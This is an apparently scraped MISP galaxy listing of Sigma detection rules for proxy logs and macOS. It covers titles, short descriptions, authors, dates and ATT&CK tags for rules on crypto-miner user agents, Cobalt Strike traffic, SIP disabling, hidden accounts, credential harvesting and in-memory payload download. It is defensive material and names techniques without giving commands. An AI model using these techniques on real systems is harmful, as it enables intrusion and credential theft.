Detects suspicious user agent strings used by crypto miners in proxy logs

Internal MISP references

UUID fa935401-513b-467b-81f4-f9e77aa0dd78 which can be used as unique global reference for Crypto Miner User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/21
falsepositive ['Unknown']
filename proxy_ua_cryptominer.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

F5 BIG-IP iControl Rest API Command Execution - Proxy

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

Internal MISP references

UUID b59c98c6-95e8-4d65-93ee-f594dfb96b17 which can be used as unique global reference for F5 BIG-IP iControl Rest API Command Execution - Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Thurein Oo
creation_date 2023/11/08
falsepositive ['Legitimate usage of the BIG-IP REST API to execute commands for administration purposes']
filename proxy_f5_tm_utility_bash_api_request.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Raw Paste Service Access

Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form

Internal MISP references

UUID 5468045b-4fcc-4d1a-973c-c9c9578edacb which can be used as unique global reference for Raw Paste Service Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/05
falsepositive ['User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)']
filename proxy_raw_paste_service_access.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.t1102.001', 'attack.t1102.003', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Suspicious Base64 Encoded User-Agent

Detects suspicious encoded User-Agent strings, as seen used by some malware.

Internal MISP references

UUID d443095b-a221-4957-a2c4-cd1756c9b747 which can be used as unique global reference for Suspicious Base64 Encoded User-Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive ['Unknown']
filename proxy_ua_base64_encoded.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Download From Suspicious TLD - Blacklist

Detects download of certain file types from hosts in suspicious TLDs

Internal MISP references

UUID 00d0b5ab-1f55-4120-8e83-487c0a7baf19 which can be used as unique global reference for Download From Suspicious TLD - Blacklist in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/07
falsepositive ['All kinds of software downloads']
filename proxy_download_susp_tlds_blacklist.yml
level low
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1566', 'attack.execution', 'attack.t1203', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

HackTool - CobaltStrike Malleable Profile Patterns - Proxy

Detects Cobalt Strike Malleable C2 profile patterns (URI, User-Agents, Methods).

Internal MISP references

UUID f3f21ce1-cdef-4bfc-8328-ed2e826f5fac which can be used as unique global reference for HackTool - CobaltStrike Malleable Profile Patterns - Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Florian Roth (Nextron Systems)
creation_date 2024/02/15
falsepositive ['Unknown']
filename proxy_hktl_cobalt_strike_malleable_c2_requests.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

PwnDrp Access

Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity

Internal MISP references

UUID 2b1ee7e4-89b6-4739-b7bb-b811b6607e5e which can be used as unique global reference for PwnDrp Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/04/15
falsepositive ['Unknown']
filename proxy_pwndrop.yml
level critical
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.t1102.001', 'attack.t1102.003']
Related clusters

To see the related clusters, click here.

Hack Tool User Agent

Detects suspicious user agent strings used by hack tools in proxy logs

Internal MISP references

UUID c42a3073-30fb-48ae-8c99-c23ada84b103 which can be used as unique global reference for Hack Tool User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_hacktool.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190', 'attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Flash Player Update from Suspicious Location

Detects a Flash Player update from an unofficial location

Internal MISP references

UUID 4922a5dd-6743-4fc2-8e81-144374280997 which can be used as unique global reference for Flash Player Update from Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/10/25
falsepositive ['Unknown flash download locations']
filename proxy_susp_flash_download_loc.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1189', 'attack.execution', 'attack.t1204.002', 'attack.defense_evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Search-ms and WebDAV Suspicious Indicators in URL

Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.

Internal MISP references

UUID 5039f3d2-406a-4c1a-9350-7a5a85dc84c2 which can be used as unique global reference for Search-ms and WebDAV Suspicious Indicators in URL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski
creation_date 2023/08/21
falsepositive ['Unknown']
filename proxy_webdav_search_ms.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1584', 'attack.t1566']
Related clusters

To see the related clusters, click here.

Startup Items

Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.

Internal MISP references

UUID dfe8b941-4e54-4242-b674-6b613d521962 which can be used as unique global reference for Startup Items in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/14
falsepositive ['Legitimate administration activities']
filename file_event_macos_startup_items.yml
level low
logsource.category file_event
logsource.product macos
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1037.005']
Related clusters

To see the related clusters, click here.

MacOS Emond Launch Daemon

Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.

Internal MISP references

UUID 23c43900-e732-45a4-8354-63e4a6c187ce which can be used as unique global reference for MacOS Emond Launch Daemon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/23
falsepositive ['Legitimate administration activities']
filename file_event_macos_emond_launch_daemon.yml
level medium
logsource.category file_event
logsource.product macos
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.014']
Related clusters

To see the related clusters, click here.

JXA In-memory Execution Via OSAScript

Detects possible malicious execution of JXA in-memory via OSAScript

Internal MISP references

UUID f1408a58-0e94-4165-b80a-da9f96cf6fc3 which can be used as unique global reference for JXA In-memory Execution Via OSAScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_macos_jxa_in_memory_execution.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.t1059.002', 'attack.t1059.007', 'attack.execution']
Related clusters

To see the related clusters, click here.

Suspicious Microsoft Office Child Process - MacOS

Detects suspicious child processes spawned by Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution

Internal MISP references

UUID 69483748-1525-4a6c-95ca-90dc8d431b68 which can be used as unique global reference for Suspicious Microsoft Office Child Process - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_macos_office_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.persistence', 'attack.t1059.002', 'attack.t1137.002', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Security Software Discovery - MacOs

Detects usage of system utilities (only grep for now) to perform security software discovery

Internal MISP references

UUID 0ed75b9c-c73b-424d-9e7d-496cd565fbe0 which can be used as unique global reference for Security Software Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_security_software_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

OSACompile Run-Only Execution

Detects potentially suspicious run-only executions compiled using OSACompile

Internal MISP references

UUID b9d9b652-d8ed-4697-89a2-a1186ee680ac which can be used as unique global reference for OSACompile Run-Only Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_macos_osacompile_runonly_execution.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.t1059.002', 'attack.execution']
Related clusters

To see the related clusters, click here.

System Integrity Protection (SIP) Enumeration

Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploitation scenarios.

Internal MISP references

UUID 53821412-17b0-4147-ade0-14faae67d54b which can be used as unique global reference for System Integrity Protection (SIP) Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/01/02
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_csrutil_status.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

System Information Discovery Using sw_vers

Detects the use of "sw_vers" for system information discovery

Internal MISP references

UUID 5de06a6f-673a-4fc0-8d48-bcfe3837b033 which can be used as unique global reference for System Information Discovery Using sw_vers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/12/20
falsepositive ['Legitimate administrative activities']
filename proc_creation_macos_swvers_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

System Integrity Protection (SIP) Disabled

Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploitation scenarios.

Internal MISP references

UUID 3603f18a-ec15-43a1-9af2-d196c8a7fec6 which can be used as unique global reference for System Integrity Protection (SIP) Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/01/02
falsepositive ['Unknown']
filename proc_creation_macos_csrutil_disable.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

Screen Capture - macOS

Detects attempts to use screencapture to collect macOS screenshots

Internal MISP references

UUID 0877ed01-da46-4c49-8476-d49cdd80dfa7 which can be used as unique global reference for Screen Capture - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/13
falsepositive ['Legitimate user activity taking screenshots']
filename proc_creation_macos_screencapture.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.collection', 'attack.t1113']

Clipboard Data Collection Via OSAScript

Detects possible collection of data from the clipboard via execution of the osascript binary

Internal MISP references

UUID 7794fa3c-edea-4cff-bec7-267dd4770fd7 which can be used as unique global reference for Clipboard Data Collection Via OSAScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unlikely']
filename proc_creation_macos_clipboard_data_via_osascript.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.collection', 'attack.execution', 'attack.t1115', 'attack.t1059.002']

System Information Discovery Using Ioreg

Detects the use of "ioreg", which shows I/O Kit registry information. This process is used for system information discovery. It has been observed in the wild, either called directly or via bash and grep to look for specific strings.

Internal MISP references

UUID 2d5e7a8b-f484-4a24-945d-7f0efd52eab0 which can be used as unique global reference for System Information Discovery Using Ioreg in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/12/20
falsepositive ['Legitimate administrative activities']
filename proc_creation_macos_ioreg_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1082']

File and Directory Discovery - MacOS

Detects usage of system utilities to discover files and directories

Internal MISP references

UUID 089dbdf6-b960-4bcc-90e3-ffc3480c20f6 which can be used as unique global reference for File and Directory Discovery - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_file_and_directory_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1083']

MacOS Scripting Interpreter AppleScript

Detects execution of scripts written in the macOS scripting language AppleScript.

Internal MISP references

UUID 1bc2e6c5-0885-472b-bed6-be5ea8eace55 which can be used as unique global reference for MacOS Scripting Interpreter AppleScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/21
falsepositive ['Application installers might contain scripts as part of the installation process.']
filename proc_creation_macos_applescript.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.t1059.002']

Osacompile Execution By Potentially Suspicious Applet/Osascript

Detects a potentially suspicious applet or osascript process executing "osacompile".

Internal MISP references

UUID a753a6af-3126-426d-8bd0-26ebbcb92254 which can be used as unique global reference for Osacompile Execution By Potentially Suspicious Applet/Osascript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r), Red Canary (Idea)
creation_date 2023/04/03
falsepositive ['Unknown']
filename proc_creation_macos_suspicious_applet_behaviour.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.t1059.002']

Gatekeeper Bypass via Xattr

Detects macOS Gatekeeper bypass via xattr utility

Internal MISP references

UUID f5141b6d-9f42-41c6-a7bf-2a780678b29b which can be used as unique global reference for Gatekeeper Bypass via Xattr in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_xattr_gatekeeper_bypass.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1553.001']

Root Account Enable Via Dsenableroot

Detects attempts to enable the root account via "dsenableroot"

Internal MISP references

UUID 821bcf4d-46c7-4b87-bc57-9509d3ba7c11 which can be used as unique global reference for Root Account Enable Via Dsenableroot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/08/22
falsepositive ['Unknown']
filename proc_creation_macos_dsenableroot_enable_root_account.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1078', 'attack.t1078.001', 'attack.t1078.003', 'attack.initial_access', 'attack.persistence']

MacOS Network Service Scanning

Detects enumeration of local or remote network services.

Internal MISP references

UUID 84bae5d4-b518-4ae0-b331-6d4afd34d00f which can be used as unique global reference for MacOS Network Service Scanning in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/21
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_network_service_scanning.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1046']

Suspicious Browser Child Process - MacOS

Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.

Internal MISP references

UUID 0250638a-2b28-4541-86fc-ea4c558fa0c6 which can be used as unique global reference for Suspicious Browser Child Process - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/04/05
falsepositive ['Legitimate browser install, update and recovery scripts']
filename proc_creation_macos_susp_browser_child_process.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.execution', 'attack.t1189', 'attack.t1203', 'attack.t1059']

JAMF MDM Potential Suspicious Child Process

Detects potentially suspicious child processes of "jamf". This could be a sign of abuse of Jamf as a C2 server, as seen with the Typhon MythicAgent.

Internal MISP references

UUID 2316929c-01aa-438c-970f-099145ab1ee6 which can be used as unique global reference for JAMF MDM Potential Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/22
falsepositive ['Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly']
filename proc_creation_macos_jamf_susp_child.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution']

Suspicious Execution via macOS Script Editor

Detects when the macOS Script Editor utility spawns an unusual child process.

Internal MISP references

UUID 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4 which can be used as unique global reference for Suspicious Execution via macOS Script Editor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/21
falsepositive ['Unknown']
filename proc_creation_macos_susp_execution_macos_script_editor.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1566', 'attack.t1566.002', 'attack.initial_access', 'attack.t1059', 'attack.t1059.002', 'attack.t1204', 'attack.t1204.001', 'attack.execution', 'attack.persistence', 'attack.t1553', 'attack.defense_evasion']

Potential Persistence Via PlistBuddy

Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility

Internal MISP references

UUID 65d506d3-fcfe-4071-b4b2-bcefe721bbbb which can be used as unique global reference for Potential Persistence Via PlistBuddy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/02/18
falsepositive ['Unknown']
filename proc_creation_macos_persistence_via_plistbuddy.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.persistence', 'attack.t1543.001', 'attack.t1543.004']

Guest Account Enabled Via Sysadminctl

Detects attempts to enable the guest account using the sysadminctl utility

Internal MISP references

UUID d7329412-13bd-44ba-a072-3387f804a106 which can be used as unique global reference for Guest Account Enabled Via Sysadminctl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/02/18
falsepositive ['Unknown']
filename proc_creation_macos_sysadminctl_enable_guest_account.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.t1078', 'attack.t1078.001']

Binary Padding - MacOS

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.

Internal MISP references

UUID 95361ce5-c891-4b0a-87ca-e24607884a96 which can be used as unique global reference for Binary Padding - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate script work']
filename proc_creation_macos_binary_padding.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1027.001']

Creation Of A Local User Account

Detects the creation of a new user account. Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system.

Internal MISP references

UUID 51719bf5-e4fd-4e44-8ba8-b830e7ac0731 which can be used as unique global reference for Creation Of A Local User Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_create_account.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.t1136.001', 'attack.persistence']

System Information Discovery Using System_Profiler

Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.

Internal MISP references

UUID 4809c683-059b-4935-879d-36835986f8cf which can be used as unique global reference for System Information Discovery Using System_Profiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stephen Lincoln @slincoln_aiq (AttackIQ)
creation_date 2024/01/02
falsepositive ['Legitimate administrative activities']
filename proc_creation_macos_system_profiler_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.defense_evasion', 'attack.t1082', 'attack.t1497.001']

Potential Discovery Activity Using Find - MacOS

Detects usage of "find" binary in a suspicious manner to perform discovery

Internal MISP references

UUID 85de3a19-b675-4a51-bfc6-b11a5186c971 which can be used as unique global reference for Potential Discovery Activity Using Find - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_macos_susp_find_execution.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1083']

Hidden User Creation

Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option

Internal MISP references

UUID b22a5b36-2431-493a-8be1-0bae56c28ef3 which can be used as unique global reference for Hidden User Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/10
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_create_hidden_account.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1564.002']

Suspicious History File Operations

Detects command-line operations on shell history files

Internal MISP references

UUID 508a9374-ad52-4789-b568-fc358def2c65 which can be used as unique global reference for Suspicious History File Operations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2020/10/17
falsepositive ['Legitimate administrative activity', 'Legitimate software, cleaning hist file']
filename proc_creation_macos_susp_histfile_operations.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1552.003']

Potential Base64 Decoded From Images

Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.

Internal MISP references

UUID 09a910bf-f71f-4737-9c40-88880ba5913d which can be used as unique global reference for Potential Base64 Decoded From Images in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/12/20
falsepositive ['Unknown']
filename proc_creation_macos_tail_base64_decode_from_image.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1140']

System Network Connections Discovery - MacOs

Detects usage of system utilities to discover system network connections

Internal MISP references

UUID 9a7a0393-2144-4626-9bf1-7c2f5a7321db which can be used as unique global reference for System Network Connections Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_system_network_connections_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1049']

System Network Discovery - macOS

Detects enumeration of local network configuration

Internal MISP references

UUID 58800443-f9fc-4d55-ae0c-98a3966dfb97 which can be used as unique global reference for System Network Discovery - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_system_network_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1016']

Potential XCSSET Malware Infection

Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.

Internal MISP references

UUID 47d65ac0-c06f-4ba2-a2e3-d263139d0f51 which can be used as unique global reference for Potential XCSSET Malware Infection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Unknown']
filename proc_creation_macos_xcsset_malware_infection.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.command_and_control']

Credentials In Files

Detects attempts to extract passwords with grep and LaZagne

Internal MISP references

UUID 53b1b378-9b06-4992-b972-dde6e423d2b4 which can be used as unique global reference for Credentials In Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Unknown']
filename proc_creation_macos_find_cred_in_files.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1552.001']

Suspicious MacOS Firmware Activity

Detects when a user manipulates the firmware password on macOS. NOTE: this command has been disabled on Apple silicon computers.

Internal MISP references

UUID 7ed2c9f7-c59d-4c82-a7e2-f859aa676099 which can be used as unique global reference for Suspicious MacOS Firmware Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/30
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_susp_macos_firmware_activity.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.impact']

User Added To Admin Group Via Dscl

Detects attempts to create and add an account to the admin group via "dscl"

Internal MISP references

UUID b743623c-2776-40e0-87b1-682b975d0ca5 which can be used as unique global reference for User Added To Admin Group Via Dscl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/03/19
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_dscl_add_user_to_admin_group.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.privilege_escalation', 'attack.t1078.003']

File Time Attribute Change

Detects file time attribute changes used to hide new files or changes to existing files

Internal MISP references

UUID 88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0 which can be used as unique global reference for File Time Attribute Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Unknown']
filename proc_creation_macos_change_file_time_attr.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1070.006']

Payload Decoded and Decrypted via Built-in Utilities

Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.

Internal MISP references

UUID 234dc5df-40b5-49d1-bf53-0d44ce778eca which can be used as unique global reference for Payload Decoded and Decrypted via Built-in Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Unknown']
filename proc_creation_macos_payload_decoded_and_decrypted.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1059', 'attack.t1204', 'attack.execution', 'attack.t1140', 'attack.defense_evasion', 'attack.s0482', 'attack.s0402']

Space After Filename - macOS

Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.

Internal MISP references

UUID b6e2a2e3-2d30-43b1-a4ea-071e36595690 which can be used as unique global reference for Space After Filename - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone
creation_date 2021/11/20
falsepositive ['Mistyped commands or legitimate binaries named to match the pattern']
filename proc_creation_macos_space_after_filename.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1036.006']

Potential In-Memory Download And Compile Of Payloads

Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware

Internal MISP references

UUID 13db8d2e-7723-4c2c-93c1-a4d36994f7ef which can be used as unique global reference for Potential In-Memory Download And Compile Of Payloads in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r), Red Canary (idea)
creation_date 2023/08/22
falsepositive ['Unknown']
filename proc_creation_macos_susp_in_memory_download_and_compile.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.command_and_control', 'attack.execution', 'attack.t1059.007', 'attack.t1105']

Local Groups Discovery - MacOs

Detects enumeration of local system groups

Internal MISP references

UUID 89bb1f97-c7b9-40e8-b52b-7d6afbd67276 which can be used as unique global reference for Local Groups Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_local_groups.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1069.001']

Scheduled Cron Task/Job - MacOs

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection focuses on crontab jobs loaded from the tmp folder.

Internal MISP references

UUID 7c3b43d8-d794-47d2-800a-d277715aa460 which can be used as unique global reference for Scheduled Cron Task/Job - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_schedule_task_job_cron.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.003']

Decode Base64 Encoded Text -MacOs

